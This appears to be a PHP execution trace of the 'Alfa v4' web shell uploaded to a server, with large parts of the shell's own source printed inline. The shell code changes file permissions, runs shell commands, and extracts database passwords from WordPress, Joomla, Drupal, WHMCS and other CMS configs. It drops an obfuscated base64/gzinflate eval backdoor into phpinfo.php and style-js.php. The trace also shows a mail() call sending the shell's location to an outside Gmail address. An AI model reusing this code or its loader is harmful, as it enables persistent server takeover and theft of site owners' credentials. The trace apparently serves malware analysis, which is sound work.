rawurldecode($_POST[\'alfa2\']);\r\n\t$action = $_POST["alfa3"];\r\n\tif($action == "permission"){\r\n\t\t$perms = 0;\r\n\t\t$perm = $_POST["alfa2"];\r\n\t\tfor($i=strlen($perm)-1;$i>=0;--$i){\r\n\t\t\t$perms += (int)$perm[$i]*pow(8, (strlen($perm)-$i-1));\r\n\t\t}\r\n\t\tif(@chmod($_POST[\'alfa1\'], $perms)){\r\n\t\t\techo("done");\r\n\t\t}else{\r\n\t\t\techo("no");\r\n\t\t}\r\n\t\treturn;\r\n\t}\r\n\tif($action == "rename" || $action == "move"){\r\n\t\t$alfa1_decoded = $_POST[\'alfa1\'];\r\n\t\tif($chdir_fals){\r\n\t\t\t$_POST[\'alfa1\'] = $_POST["c"]."/".$_POST["alfa1"];\r\n\t\t}\r\n\t\t$_POST[\'alfa1\'] = trim($_POST[\'alfa1\']);\r\n\t\t$alfa1_escape = addslashes($_POST["alfa1"]);\r\n\t\tif($_POST["alfa3"] == "rename"){\r\n\t\t\t$_POST[\'alfa2\'] = basename($_POST[\'alfa2\']);\r\n\t\t}\r\n\t\tif(!empty($_POST[\'alfa2\'])){\r\n\t\t\t$cmd_rename = false;\r\n\t\t\tif($chdir_fals&&$alfa_canruncmd){\r\n\t\t\t\tif(_alfa_is_writable($_POST[\'alfa1\'])){\r\n\t\t\t\t\t$cmd_rename = true;\r\n\t\t\t\t\t$alfa1_escape = addslashes($alfa1_decoded);\r\n\t\t\t\t\talfaEx("cd \'".addslashes($_POST[\'c\'])."\';mv \'".$alfa1_escape."\' \'".addslashes($_POST[\'alfa2\'])."\'");\r\n\t\t\t\t}\r\n\t\t\t}\r\n\t\t\tif(!file_exists($_POST[\'alfa2\'])){\r\n\t\t\t\tif(@rename($_POST[\'alfa1\'], $_POST[\'alfa2\'])||$cmd_rename){\r\n\t\t\t\t\techo "done";\r\n\t\t\t\t}else{\r\n\t\t\t\t\techo "no";\r\n\t\t\t\t}\r\n\t\t\t}else{\r\n\t\t\t\techo "no";\r\n\t\t\t}\r\n\t\t}\r\n\t}elseif($action == "copy"){\r\n\t\tif(is_dir($_POST["alfa1"])){\r\n\t\t\t$dir = str_replace(\'//\', \'/\', $_POST["alfa1"]);\r\n\t\t\t$dir = explode(\'/\', $dir);\r\n\t\t\tif(empty($dir[count($dir) - 1])){\r\n\t\t\t\t$name = $dir[count($dir) - 2];\r\n\t\t\t}else{\r\n\t\t\t\t$name = $dir[count($dir) - 1];\r\n\t\t\t}\r\n\t\t}else{\r\n\t\t\t$name = basename($_POST["alfa1"]);\r\n\t\t}\r\n\t\t$dir = dirname($_POST["alfa1"]);\r\n\t\tif($dir == "."){\r\n\t\t\t$dir = $_POST["c"]."/";\r\n\t\t}\r\n\t\tif(is_file($_POST["alfa1"])){\r\n\t\t\t@copy($_POST["alfa1"], $_POST["alfa2"]);\r\n\t\t\techo("done");\r\n\t\t}elseif(is_dir($_POST["alfa1"])){\r\n\t\t\tif(!is_dir($_POST["alfa2"])){\r\n\t\t\t\tmkdir($_POST["alfa2"], 0755, true);\r\n\t\t\t}\r\n\t\t\tcopy_paste($dir, $name , $_POST["alfa2"] . "/");\r\n\t\t\techo("done");\r\n\t\t}\r\n\t}elseif($action == "modify"){\r\n\t\tif( !empty($_POST[\'alfa1\']) ) {\r\n\t\t\t$time = strtotime($_POST[\'alfa1\']);\r\n\t\t\tif($time){\r\n\t\t\t\t$touched = false;\r\n\t\t\t\tif($chdir_fals&&$alfa_canruncmd){\r\n\t\t\t\t\talfaEx("cd \'".addslashes($_POST["c"])."\';touch -d \'".htmlspecialchars(addslashes($_POST[\'alfa1\']))."\' \'".addslashes($_POST[\'alfa2\'])."\'");\r\n\t\t\t\t\t$touched = true;\r\n\t\t\t\t}\r\n\t\t\t\tif(!@touch($_POST[\'alfa2\'],$time,$time)&&!$touched){\r\n\t\t\t\t\techo \'no\';\r\n\t\t\t\t}else{\r\n\t\t\t\t\techo \'ok\';\r\n\t\t\t\t}\r\n\t\t\t} else{\r\n\t\t\t\t echo \'badtime\';\r\n\t\t\t}\r\n\t\t}\r\n\t}\r\n\r\n}\r\nfunction alfaget_flags(){\r\n\t$flags = array();\r\n\tif(function_exists("curl_version")){\r\n\t\t$curl = new AlfaCURL();\r\n\t\t$server_addr = (!@$_SERVER["SERVER_ADDR"]?(function_exists("gethostbyname")?@gethostbyname($_SERVER[\'SERVER_NAME\']):\'????\'):@$_SERVER["SERVER_ADDR"]);\r\n\t\t$flag = $curl->Send("http://www.geoplugin.net/json.gp?ip=" . $server_addr);\r\n\t\t$flag2 = $curl->Send("http://www.geoplugin.net/json.gp?ip=" . $_SERVER["REMOTE_ADDR"]);\r\n\t\tif(strpos($flag2, "geoplugin") != false){\r\n\t\t\t$flag = json_decode($flag, true);\r\n\t\t\t$flag2 = json_decode($flag2, true);\r\n\t\t\tif(!empty($flag[\'geoplugin_countryCode\'])){\r\n\t\t\t\t$flags["server"]["name"] = $flag[\'geoplugin_countryName\'];\r\n\t\t\t\t$flags["server"]["code"] = $flag[\'geoplugin_countryCode\'];\r\n\t\t\t}\r\n\t\t\tif(!empty($flag2[\'geoplugin_countryCode\'])){\r\n\t\t\t\t$flags["client"]["name"] = $flag2[\'geoplugin_countryName\'];\r\n\t\t\t\t$flags["client"]["code"] = $flag2[\'geoplugin_countryCode\'];\r\n\t\t\t}\r\n\t\t}\r\n\t}\r\n\techo json_encode($flags);\r\n}\r\nfunction alfaGetConfig(){\r\n$cms = $_POST[\'alfa1\'];\r\n$path = trim($_POST[\'alfa2\']);\r\n$config = array(\r\n\'wp\'=>array(\'file\'=>\'/wp-config.php\',\r\n\'host\'=>array("/define[ ]{0,}\\([ ]{0,}(?:\'|\\")DB_HOST(?:\'|\\")[ ]{0,},[ ]{0,}(?:\'|\\")(.*?)(?:\'|\\")[ ]{0,}\\)[ ]{0,};/",1),\r\n\'dbname\'=>array("/define[ ]{0,}\\([ ]{0,}(?:\'|\\")DB_NAME(?:\'|\\")[ ]{0,},[ ]{0,}(?:\'|\\")(.*?)(?:\'|\\")[ ]{0,}\\)[ ]{0,};/",1),\r\n\'dbuser\'=>array("/define[ ]{0,}\\([ ]{0,}(?:\'|\\")DB_USER(?:\'|\\")[ ]{0,},[ ]{0,}(?:\'|\\")(.*?)(?:\'|\\")[ ]{0,}\\)[ ]{0,};/",1),\r\n\'dbpw\'=>array("/define[ ]{0,}\\([ ]{0,}(?:\'|\\")DB_PASSWORD(?:\'|\\")[ ]{0,},[ ]{0,}(?:\'|\\")(.*?)(?:\'|\\")[ ]{0,}\\)[ ]{0,};/",1),\r\n\'prefix\'=>array("/table_prefix[ ]{0,}=[ ]{0,}(?:\'|\\")(.*?)(?:\'|\\")[ ]{0,};/",1)\r\n),\r\n\'drupal\'=>array(\'file\'=>\'/config.php\',\r\n\'host\'=>array("/define[ ]{0,}\\([ ]{0,}(?:\'|\\")DB_HOSTNAME(?:\'|\\")[ ]{0,},[ ]{0,}(?:\'|\\")(.*?)(?:\'|\\")[ ]{0,}\\)[ ]{0,};/",1),\r\n\'dbname\'=>array("/define[ ]{0,}\\([ ]{0,}(?:\'|\\")DB_DATABASE(?:\'|\\")[ ]{0,},[ ]{0,}(?:\'|\\")(.*?)(?:\'|\\")[ ]{0,}\\)[ ]{0,};/",1),\r\n\'dbuser\'=>array("/define[ ]{0,}\\([ ]{0,}(?:\'|\\")DB_USERNAME(?:\'|\\")[ ]{0,},[ ]{0,}(?:\'|\\")(.*?)(?:\'|\\")[ ]{0,}\\)[ ]{0,};/",1),\r\n\'dbpw\'=>array("/define[ ]{0,}\\([ ]{0,}(?:\'|\\")DB_PASSWORD(?:\'|\\")[ ]{0,},[ ]{0,}(?:\'|\\")(.*?)(?:\'|\\")[ ]{0,}\\)[ ]{0,};/",1),\r\n\'prefix\'=>array("/define[ ]{0,}\\([ ]{0,}(?:\'|\\")DB_PREFIX(?:\'|\\")[ ]{0,},[ ]{0,}(?:\'|\\")(.*?)(?:\'|\\")[ ]{0,}\\)[ ]{0,};/",1)\r\n),\r\n\'drupal2\'=>array(\'file\'=>\'/sites/default/settings.php\',\r\n\'host\'=>array("/(?:\'|\\")host(?:\'|\\")[ ]{0,}=>[ ]{0,}(?:\'|\\")(.*?)(?:\'|\\")[ ]{0,},/",1),\r\n\'dbname\'=>array("/(?:\'|\\")database(?:\'|\\")[ ]{0,}=>[ ]{0,}(?:\'|\\")(.*?)(?:\'|\\")[ ]{0,},/",1),\r\n\'dbuser\'=>array("/(?:\'|\\")username(?:\'|\\")[ ]{0,}=>[ ]{0,}(?:\'|\\")(.*?)(?:\'|\\")[ ]{0,},/",1),\r\n\'dbpw\'=>array("/(?:\'|\\")password(?:\'|\\")[ ]{0,}=>[ ]{0,}(?:\'|\\")(.*?)(?:\'|\\")[ ]{0,},/",1),\r\n\'prefix\'=>array("/(?:\'|\\")prefix(?:\'|\\")[ ]{0,}=>[ ]{0,}(?:\'|\\")(.*?)(?:\'|\\")[ ]{0,},/",1)\r\n),\r\n\'vb\'=>array(\'file\'=>\'/includes/config.php\',\r\n\'host\'=>array("/config\\[(?:\'|\\")MasterServer(?:\'|\\")\\]\\[(?:\'|\\")servername(?:\'|\\")\\](\\s+)=(\\s+)(?:\'|\\")(.*?)(?:\'|\\")[ ]{0,};/",3),\r\n\'dbuser\'=>array("/config\\[(?:\'|\\")MasterServer(?:\'|\\")\\]\\[(?:\'|\\")username(?:\'|\\")\\](\\s+)=(\\s+)(?:\'|\\")(.*?)(?:\'|\\")[ ]{0,};/",3),\r\n\'dbname\'=>array("/config\\[(?:\'|\\")Database(?:\'|\\")\\]\\[(?:\'|\\")dbname(?:\'|\\")\\](\\s+)=(\\s+)(?:\'|\\")(.*?)(?:\'|\\")[ ]{0,};/",3),\r\n\'dbpw\'=>array("/config\\[(?:\'|\\")MasterServer(?:\'|\\")\\]\\[(?:\'|\\")password(?:\'|\\")\\](\\s+)=(\\s+)(?:\'|\\")(.*?)(?:\'|\\")[ ]{0,};/",3),\r\n\'prefix\'=>array("/config\\[(?:\'|\\")Database(?:\'|\\")\\]\\[(?:\'|\\")tableprefix(?:\'|\\")\\](\\s+)=(\\s+)(?:\'|\\")(.*?)(?:\'|\\")[ ]{0,};/",3)\r\n),\r\n\'phpnuke\'=>array(\'file\'=>\'/config.php\',\r\n\'host\'=>array(\'/dbhost(\\s+)=(\\s+)(?:\\\'|")(.*?)(?:\\\'|");/\',3),\r\n\'dbname\'=>array(\'/dbname(\\s+)=(\\s+)(?:\\\'|")(.*?)(?:\\\'|");/\',3),\r\n\'dbuser\'=>array(\'/dbuname(\\s+)=(\\s+)(?:\\\'|")(.*?)(?:\\\'|");/\',3),\r\n\'dbpw\'=>array(\'/dbpass(\\s+)=(\\s+)(?:\\\'|")(.*?)(?:\\\'|");/\',3),\r\n\'prefix\'=>array(\'/prefix(\\s+)=(\\s+)(?:\\\'|")(.*?)(?:\\\'|");/\',3)\r\n),\r\n\'smf\'=>array(\'file\'=>\'/Settings.php\',\r\n\'host\'=>array("/db_server(\\s+)=(\\s+)(?:\'|\\")(.*?)(?:\'|\\");/",3),\r\n\'dbname\'=>array("/db_name(\\s+)=(\\s+)(?:\'|\\")(.*?)(?:\'|\\");/",3),\r\n\'dbuser\'=>array("/db_user(\\s+)=(\\s+)(?:\'|\\")(.*?)(?:\'|\\");/",3),\r\n\'dbpw\'=>array("/db_passwd(\\s+)=(\\s+)(?:\'|\\")(.*?)(?:\'|\\");/",3),\r\n\'prefix\'=>array("/db_prefix(\\s+)=(\\s+)(?:\'|\\")(.*?)(?:\'|\\");/",3)\r\n),\r\n\'whmcs\'=>array(\'file\'=>\'/configuration.php\',\r\n\'host\'=>array("/db_host(\\s+)=(\\s+)(?:\'|\\")(.*?)(?:\'|\\");/",3),\r\n\'dbname\'=>array("/db_name(\\s+)=(\\s+)(?:\'|\\")(.*?)(?:\'|\\");/",3),\r\n\'dbuser\'=>array("/db_username(\\s+)=(\\s+)(?:\'|\\")(.*?)(?:\'|\\");/",3),\r\n\'dbpw\'=>array("/db_password(\\s+)=(\\s+)(?:\'|\\")(.*?)(?:\'|\\");/",3),\r\n\'cc_encryption_hash\'=>array("/cc_encryption_hash(\\s+)=(\\s+)(?:\'|\\")(.*?)(?:\'|\\");/",3)\r\n),\r\n\'joomla\'=>array(\'file\'=>\'/configuration.php\',\r\n\'host\'=>array("/\\\\\\$host(\\s+)=(\\s+)(?:\'|\\")(.*?)(?:\'|\\");/",3),\r\n\'dbname\'=>array("/\\\\\\$db(\\s+)=(\\s+)(?:\'|\\")(.*?)(?:\'|\\");/",3),\r\n\'dbuser\'=>array("/\\\\\\$user(\\s+)=(\\s+)(?:\'|\\")(.*?)(?:\'|\\");/",3),\r\n\'dbpw\'=>array("/\\\\\\$password(\\s+)=(\\s+)(?:\'|\\")(.*?)(?:\'|\\");/",3),\r\n\'prefix\'=>array("/\\\\\\$dbprefix(\\s+)=(\\s+)(?:\'|\\")(.*?)(?:\'|\\");/",3)\r\n),\r\n\'phpbb\'=>array(\'file\'=>\'/config.php\',\r\n\'host\'=>array("/dbhost(\\s+)=(\\s+)(?:\'|\\")(.*?)(?:\'|\\");/",3),\r\n\'dbname\'=>array("/dbname(\\s+)=(\\s+)(?:\'|\\")(.*?)(?:\'|\\");/",3),\r\n\'dbuser\'=>array("/dbuser(\\s+)=(\\s+)(?:\'|\\")(.*?)(?:\'|\\");/",3),\r\n\'dbpw\'=>array("/dbpasswd(\\s+)=(\\s+)(?:\'|\\")(.*?)(?:\'|\\");/",3),\r\n\'prefix\'=>array("/table_prefix(\\s+)=(\\s+)(?:\'|\\")(.*?)(?:\'|\\");/",3)\r\n),\r\n\'mybb\'=>array(\'file\'=>\'/inc/config.php\',\r\n\'host\'=>array("/config\\[\'database\'\\]\\[\'hostname\'\\](\\s+)=(\\s+)(?:\'|\\")(.*?)(?:\'|\\");/",3),\r\n\'dbname\'=>array("/config\\[\'database\'\\]\\[\'database\'\\](\\s+)=(\\s+)(?:\'|\\")(.*?)(?:\'|\\");/",3),\r\n\'dbuser\'=>array("/config\\[\'database\'\\]\\[\'username\'\\](\\s+)=(\\s+)(?:\'|\\")(.*?)(?:\'|\\");/",3),\r\n\'dbpw\'=>array("/config\\[\'database\'\\]\\[\'password\'\\](\\s+)=(\\s+)(?:\'|\\")(.*?)(?:\'|\\");/",3),\r\n\'prefix\'=>array("/config\\[\'database\'\\]\\[\'table_prefix\'\\](\\s+)=(\\s+)(?:\'|\\")(.*?)(?:\'|\\");/",3)\r\n)\r\n);\r\nif($cms == "drupal"){\r\n\t$file = $config[$cms][\'file\'];\r\n\t$file=$path.$file;\r\n\tif(@is_file($file)||_alfa_is_dir($file,"-e")){\r\n\t}else{\r\n\t\t$cms = \'drupal2\';\r\n\t}\r\n}\r\nif($cms == "vb"){\r\n\t$file = $config[$cms][\'file\'];\r\n\t$file=$path.$file;\r\n\tif(@is_file($file)||_alfa_is_dir($file,"-e")){\r\n\t}else{\r\n\t\t$path .= \'/core\';\r\n\t}\r\n}\r\n$data = array();\r\n$srch_host = $config[$cms][\'host\'][0];\r\n$srch_user = $config[$cms][\'dbuser\'][0];\r\n$srch_name = $config[$cms][\'dbname\'][0];\r\n$srch_pw = $config[$cms][\'dbpw\'][0];\r\n$prefix = $config[$cms][\'prefix\'][0];\r\n$file = $config[$cms][\'file\'];\r\n$chost = $config[$cms][\'host\'][1];\r\n$cuser = $config[$cms][\'dbuser\'][1];\r\n$cname = $config[$cms][\'dbname\'][1];\r\n$cpw = $config[$cms][\'dbpw\'][1];\r\n$cprefix = $config[$cms][\'prefix\'][1];\r\nif(@is_dir($path)||_alfa_is_dir($path)){\r\n$file=$path.$file;\r\n}elseif(@is_file($path)||_alfa_is_dir($path,"-e")){\r\n$file=$path;\r\n}else{\r\nreturn false;\r\n}\r\n$file = __read_file($file);\r\nif($cms == "drupal2"){\r\n\t$file = preg_replace("/\\@code(.*?)\\@endcode/s", "", $file);\r\n}elseif($cms == "vb"){\r\n\t$file = preg_replace("/right of the(.*?)BAD!/s", "", $file);\r\n}\r\nif(preg_match($srch_host, $file, $mach)){\r\n$data[\'host\'] = $mach[$chost];\r\n}\r\nif(preg_match($srch_user, $file, $mach)){\r\n$data[\'user\'] = $mach[$cuser];\r\n}\r\nif(preg_match($srch_name, $file, $mach)){\r\n$data[\'dbname\'] = $mach[$cname];\r\n}\r\nif(preg_match($srch_pw, $file, $mach)){\r\n$data[\'password\'] = $mach[$cpw];\r\n}\r\nif(isset($prefix)){\r\nif(preg_match($prefix, $file, $mach)){\r\n$data[\'prefix\'] = $mach[$cprefix];\r\n}\r\n}\r\nif($cms==\'whmcs\'){\r\nif(preg_match($config[$cms][\'cc_encryption_hash\'][0], $file, $mach)){\r\n$data[\'cc_encryption_hash\'] = $mach[3];\r\n}\r\n}\r\necho json_encode($data);\r\n}\r\nif(empty($_POST[\'a\']))\r\nif(isset($default_action) && function_exists(\'alfa\' . $default_action))\r\n$_POST[\'a\'] = $default_action;\r\nelse\r\n$_POST[\'a\'] = \'FilesMan2\';//\'FilesMan\';\r\nif(!empty($_POST[\'a\']) && function_exists(\'alfa\' . $_POST[\'a\']))\r\ncall_user_func(\'alfa\' . $_POST[\'a\']);\r\nexit;\r\n/*\r\n#Persian Gulf For Ever\r\n#skype : sole.sad\r\n#skype : ehsan.invisible\r\n*/\r\n$ikrhtfy = $_SERVER["DOCUMENT_ROOT"].\'/\'.\'phpinfo.php\';\r\n\r\n\r\n$fghky_ouvcbt = \'<?php phpinfo();\r\n\r\n\r\n$gz = "ZXZhbCUyOCUyNnF1b3QlM0IlM0YlMjZndCUzQiUyNnF1b3QlM0IuZ3p1bmNvbXByZXNzJTI4Z3p1bmNvbXByZXNzJTI4Z3ppbmZsYXRlJTI4Z3ppbmZsYXRlJTI4Z3ppbmZsYXRlJTI4YmFzZTY0X2RlY29kZSUyOHN0cnJldiUyOCUyNGd6aW5mbGF0ZSUyOSUyOSUyOSUyOSUyOSUyOSUyOSUyOSUzQg==";\r\n$gzinflate = "=kNpMtH71+ljPksZMcCcwcK+3fDlWgk7NrBwORQ/WY/zBOoBN4X5VZLsGffsu1D7GtfN+HA/jfc4llGsPjjJ9bYdzfpXuEKc5lgWShDAjYIIyjLEB6sJ7xwmW/t3sAjUdNhc365UYm35GrrxT/tH/rnbb1CtIqbEcyy3idRJJkv+7+nmXjdVY/WLfqnB02J4O1fe/7lAU0MajUGZSsHwKqhmHzv900i0h3YtoOCJcosuAHEtpAimJmdmoFCB2NZlgqVobRLXemwlekB8PSBazZLFbIHPfRsqapn5Z2WFCGLcWb5Ls9hJahXA7YV+RHfRiYvgTQpUFHyk8tcxG2ovhQOTquhQ66yaMV9H6FEhemC6vu7woIlYFCFlmOADdmcnyI39588cbGYIw42qSs//TI4HhYD0z0ItUW6T0Zs4GozL1SjnL3tNWA5gc9D9v0HFwI8adFVbcin/sGwUBwJe+HaAeFg/cGwYB4/lBgWA";\r\neval(htmlspecialchars_decode(urldecode(base64_decode($gz))));\r\n\r\n?>\'; \r\n\r\n\r\n\r\nif (!file_exists($ikrhtfy)){  \r\n   \r\ntouch($ikrhtfy); \r\nchmod($ikrhtfy,0666); \r\n   \r\n} \r\n\r\n$opazxcdnm = fopen($ikrhtfy,"w"); \r\n\r\nif (!fwrite($opazxcdnm,$fghky_ouvcbt)){ \r\n\r\n \r\n\r\n}\r\n?>\r\n'	/var/www/html/uploads/alfav4-1.php(5) : eval()'d code	1	0
4	16	0	0.053299	3445368	session_start	0		/var/www/html/uploads/alfav4-1.php(5) : eval()'d code(1) : eval()'d code	2	0
4	16	1	0.053402	3446120
4	16	R			TRUE
4	17	0	0.053420	3446120	error_reporting	0		/var/www/html/uploads/alfav4-1.php(5) : eval()'d code(1) : eval()'d code	3	1	0
4	17	1	0.053437	3446160
4	17	R			0
4	18	0	0.053450	3446120	error_reporting	0		/var/www/html/uploads/alfav4-1.php(5) : eval()'d code(1) : eval()'d code	4	1	0
4	18	1	0.053464	3446160
4	18	R			22527
3		A						/var/www/html/uploads/alfav4-1.php(5) : eval()'d code(1) : eval()'d code	5	$a = '<?php phpinfo();\r\n\r\n$gz = "ZXZhbCUyOCUyNnF1b3QlM0IlM0YlMjZndCUzQiUyNnF1b3QlM0IuZ3p1bmNvbXByZXNzJTI4Z3p1bmNvbXByZXNzJTI4Z3ppbmZsYXRlJTI4Z3ppbmZsYXRlJTI4Z3ppbmZsYXRlJTI4YmFzZTY0X2RlY29kZSUyOHN0cnJldiUyOCUyNGd6aW5mbGF0ZSUyOSUyOSUyOSUyOSUyOSUyOSUyOSUyOSUzQg==";\r\n$gzinflate = "=kNpMtH71+ljPksZMcCcwcK+3fDlWgk7NrBwORQ/WY/zBOoBN4X5VZLsGffsu1D7GtfN+HA/jfc4llGsPjjJ9bYdzfpXuEKc5lgWShDAjYIIyjLEB6sJ7xwmW/t3sAjUdNhc365UYm35GrrxT/tH/rnbb1CtIqbEcyy3idRJJkv+7+nmXjdVY/WLfqnB02J4O1fe/7lAU0MajUGZSsHwKqhmHzv900i0h3YtoOCJc'
3		A						/var/www/html/uploads/alfav4-1.php(5) : eval()'d code(1) : eval()'d code	22	$doc = '/var/www/html'
4	19	0	0.053527	3446120	scandir	0		/var/www/html/uploads/alfav4-1.php(5) : eval()'d code(1) : eval()'d code	23	1	'/var/www/html'
4	19	1	0.053564	3446624
4	19	R			[0 => '.', 1 => '..', 2 => 'uploads']
3		A						/var/www/html/uploads/alfav4-1.php(5) : eval()'d code(1) : eval()'d code	23	$dir = [0 => '.', 1 => '..', 2 => 'uploads']
3		A						/var/www/html/uploads/alfav4-1.php(5) : eval()'d code(1) : eval()'d code	24	$d1 = '/var/www/html/.'
3		A						/var/www/html/uploads/alfav4-1.php(5) : eval()'d code(1) : eval()'d code	25	$d2 = '/var/www/html/..'
4	20	0	0.053621	3446680	array_search	0		/var/www/html/uploads/alfav4-1.php(5) : eval()'d code(1) : eval()'d code	26	2	'.'	[0 => '.', 1 => '..', 2 => 'uploads']
4	20	1	0.053640	3446752
4	20	R			0
3		A						/var/www/html/uploads/alfav4-1.php(5) : eval()'d code(1) : eval()'d code	26	$key = 0
4	21	0	0.053665	3446648	array_search	0		/var/www/html/uploads/alfav4-1.php(5) : eval()'d code(1) : eval()'d code	29	2	'..'	[1 => '..', 2 => 'uploads']
4	21	1	0.053682	3446720
4	21	R			1
3		A						/var/www/html/uploads/alfav4-1.php(5) : eval()'d code(1) : eval()'d code	29	$key = 1
4	22	0	0.053706	3446616	array_search	0		/var/www/html/uploads/alfav4-1.php(5) : eval()'d code(1) : eval()'d code	32	2	'/var/www/html/.'	[2 => 'uploads']
4	22	1	0.053722	3446688
4	22	R			FALSE
3		A						/var/www/html/uploads/alfav4-1.php(5) : eval()'d code(1) : eval()'d code	32	$key = FALSE
4	23	0	0.053747	3446616	array_search	0		/var/www/html/uploads/alfav4-1.php(5) : eval()'d code(1) : eval()'d code	35	2	'/var/www/html/..'	[2 => 'uploads']
4	23	1	0.053763	3446688
4	23	R			FALSE
3		A						/var/www/html/uploads/alfav4-1.php(5) : eval()'d code(1) : eval()'d code	35	$key = FALSE
4	24	0	0.053787	3446640	array_push	0		/var/www/html/uploads/alfav4-1.php(5) : eval()'d code(1) : eval()'d code	38	2	[2 => 'uploads']	'/var/www/html'
4	24	1	0.053803	3446704
4	24	R			2
3		A						/var/www/html/uploads/alfav4-1.php(5) : eval()'d code(1) : eval()'d code	40	$p = '/var/www/html/uploads'
4	25	0	0.053828	3446688	is_dir	0		/var/www/html/uploads/alfav4-1.php(5) : eval()'d code(1) : eval()'d code	41	1	'/var/www/html/uploads'
4	25	1	0.053847	3446752
4	25	R			TRUE
3		A						/var/www/html/uploads/alfav4-1.php(5) : eval()'d code(1) : eval()'d code	42	$file = '/var/www/html/uploads/style-js.php'
4	26	0	0.053873	3446776	touch	0		/var/www/html/uploads/alfav4-1.php(5) : eval()'d code(1) : eval()'d code	43	1	'/var/www/html/uploads/style-js.php'
4	26	1	0.053920	3446816
4	26	R			TRUE
4	27	0	0.053935	3446776	fopen	0		/var/www/html/uploads/alfav4-1.php(5) : eval()'d code(1) : eval()'d code	44	2	'/var/www/html/uploads/style-js.php'	'w'
4	27	1	0.053969	3447440
4	27	R			resource(5) of type (stream)
3		A						/var/www/html/uploads/alfav4-1.php(5) : eval()'d code(1) : eval()'d code	44	$folder = resource(5) of type (stream)
4	28	0	0.053999	3447368	fwrite	0		/var/www/html/uploads/alfav4-1.php(5) : eval()'d code(1) : eval()'d code	45	2	resource(5) of type (stream)	'<?php phpinfo();\r\n\r\n$gz = "ZXZhbCUyOCUyNnF1b3QlM0IlM0YlMjZndCUzQiUyNnF1b3QlM0IuZ3p1bmNvbXByZXNzJTI4Z3p1bmNvbXByZXNzJTI4Z3ppbmZsYXRlJTI4Z3ppbmZsYXRlJTI4Z3ppbmZsYXRlJTI4YmFzZTY0X2RlY29kZSUyOHN0cnJldiUyOCUyNGd6aW5mbGF0ZSUyOSUyOSUyOSUyOSUyOSUyOSUyOSUyOSUzQg==";\r\n$gzinflate = "=kNpMtH71+ljPksZMcCcwcK+3fDlWgk7NrBwORQ/WY/zBOoBN4X5VZLsGffsu1D7GtfN+HA/jfc4llGsPjjJ9bYdzfpXuEKc5lgWShDAjYIIyjLEB6sJ7xwmW/t3sAjUdNhc365UYm35GrrxT/tH/rnbb1CtIqbEcyy3idRJJkv+7+nmXjdVY/WLfqnB02J4O1fe/7lAU0MajUGZSsHwKqhmHzv900i0h3YtoOCJc'
4	28	1	0.054035	3447432
4	28	R			834
3		A						/var/www/html/uploads/alfav4-1.php(5) : eval()'d code(1) : eval()'d code	40	$p = '/var/www/html//var/www/html'
4	29	0	0.054062	3447376	is_dir	0		/var/www/html/uploads/alfav4-1.php(5) : eval()'d code(1) : eval()'d code	41	1	'/var/www/html//var/www/html'
4	29	1	0.054080	3447416
4	29	R			FALSE
3		A						/var/www/html/uploads/alfav4-1.php(5) : eval()'d code(1) : eval()'d code	55	$b = 'Alfa v4'
3		A						/var/www/html/uploads/alfav4-1.php(5) : eval()'d code(1) : eval()'d code	56	$c = ': /var/www/html\r\n'
3		A						/var/www/html/uploads/alfav4-1.php(5) : eval()'d code(1) : eval()'d code	58	$c .= ' : webmaster@localhost\r\n'
3		A						/var/www/html/uploads/alfav4-1.php(5) : eval()'d code(1) : eval()'d code	60	$c .= ' : Apache/2.4.52 (Ubuntu)\r\n'
3		A						/var/www/html/uploads/alfav4-1.php(5) : eval()'d code(1) : eval()'d code	62	$c .= ': http://localhost/uploads/alfav4-1.php\r\n'
3		A						/var/www/html/uploads/alfav4-1.php(5) : eval()'d code(1) : eval()'d code	64	$c .= ': localhost\r\n'
4	30	0	0.054170	3447536	mail	0		/var/www/html/uploads/alfav4-1.php(5) : eval()'d code(1) : eval()'d code	66	3	'shelldownloadorg@gmail.com'	'Alfa v4'	': /var/www/html\r\n : webmaster@localhost\r\n : Apache/2.4.52 (Ubuntu)\r\n: http://localhost/uploads/alfav4-1.php\r\n: localhost\r\n'
4	30	1	0.054874	3447632
4	30	R			FALSE
3		A						/var/www/html/uploads/alfav4-1.php(5) : eval()'d code(1) : eval()'d code	77	GLOBALS['oZgNypoPRU'] = ['username' => 'alfa', 'password' => '7fda3b84fdea259e352fee85c8523239', 'safe_mode' => '1', 'login_page' => '403', 'show_icons' => '1', 'post_encryption' => FALSE, 'cgi_api' => TRUE]
3		A						/var/www/html/uploads/alfav4-1.php(5) : eval()'d code(1) : eval()'d code	87	$CWppUDJxuf = 'function_exists'
3		A						/var/www/html/uploads/alfav4-1.php(5) : eval()'d code(1) : eval()'d code	88	$aztJtafUXm = 'charCodeAt'
3		A						/var/www/html/uploads/alfav4-1.php(5) : eval()'d code(1) : eval()'d code	89	$OVpGNqqFZs = 'eval'
3		A						/var/www/html/uploads/alfav4-1.php(5) : eval()'d code(1) : eval()'d code	90	$psDEwGhsxg = 'gzinflate'
4	31	0	0.054977	3447536	function_exists	0		/var/www/html/uploads/alfav4-1.php(5) : eval()'d code(1) : eval()'d code	92	1	'base64_encode'
4	31	1	0.054993	3447576
4	31	R			TRUE
4	32	0	0.055008	3447536	function_exists	0		/var/www/html/uploads/alfav4-1.php(5) : eval()'d code(1) : eval()'d code	140	1	'base64_decode'
4	32	1	0.055022	3447576
4	32	R			TRUE
3		A						/var/www/html/uploads/alfav4-1.php(5) : eval()'d code(1) : eval()'d code	194	GLOBALS['DB_NAME'] = ['username' => 'alfa', 'password' => '7fda3b84fdea259e352fee85c8523239', 'safe_mode' => '1', 'login_page' => '403', 'show_icons' => '1', 'post_encryption' => FALSE, 'cgi_api' => TRUE]
3		A						/var/www/html/uploads/alfav4-1.php(5) : eval()'d code(1) : eval()'d code	196	$key = 'username'
4	33	0	0.055073	3447512	substr	0		/var/www/html/uploads/alfav4-1.php(5) : eval()'d code(1) : eval()'d code	198	3	'username'	0	2
4	33	1	0.055089	3447640
4	33	R			'us'
3		A						/var/www/html/uploads/alfav4-1.php(5) : eval()'d code(1) : eval()'d code	198	$prefix = 'us'
3		A						/var/www/html/uploads/alfav4-1.php(5) : eval()'d code(1) : eval()'d code	201	GLOBALS['DB_NAME']['user'] = 'alfa'
3		A						/var/www/html/uploads/alfav4-1.php(5) : eval()'d code(1) : eval()'d code	202	GLOBALS['DB_NAME']['user_rand'] = 'username'
3		A						/var/www/html/uploads/alfav4-1.php(5) : eval()'d code(1) : eval()'d code	196	$key = 'password'
4	34	0	0.055157	3448240	substr	0		/var/www/html/uploads/alfav4-1.php(5) : eval()'d code(1) : eval()'d code	198	3	'password'	0	2
4	34	1	0.055172	3448368
4	34	R			'pa'
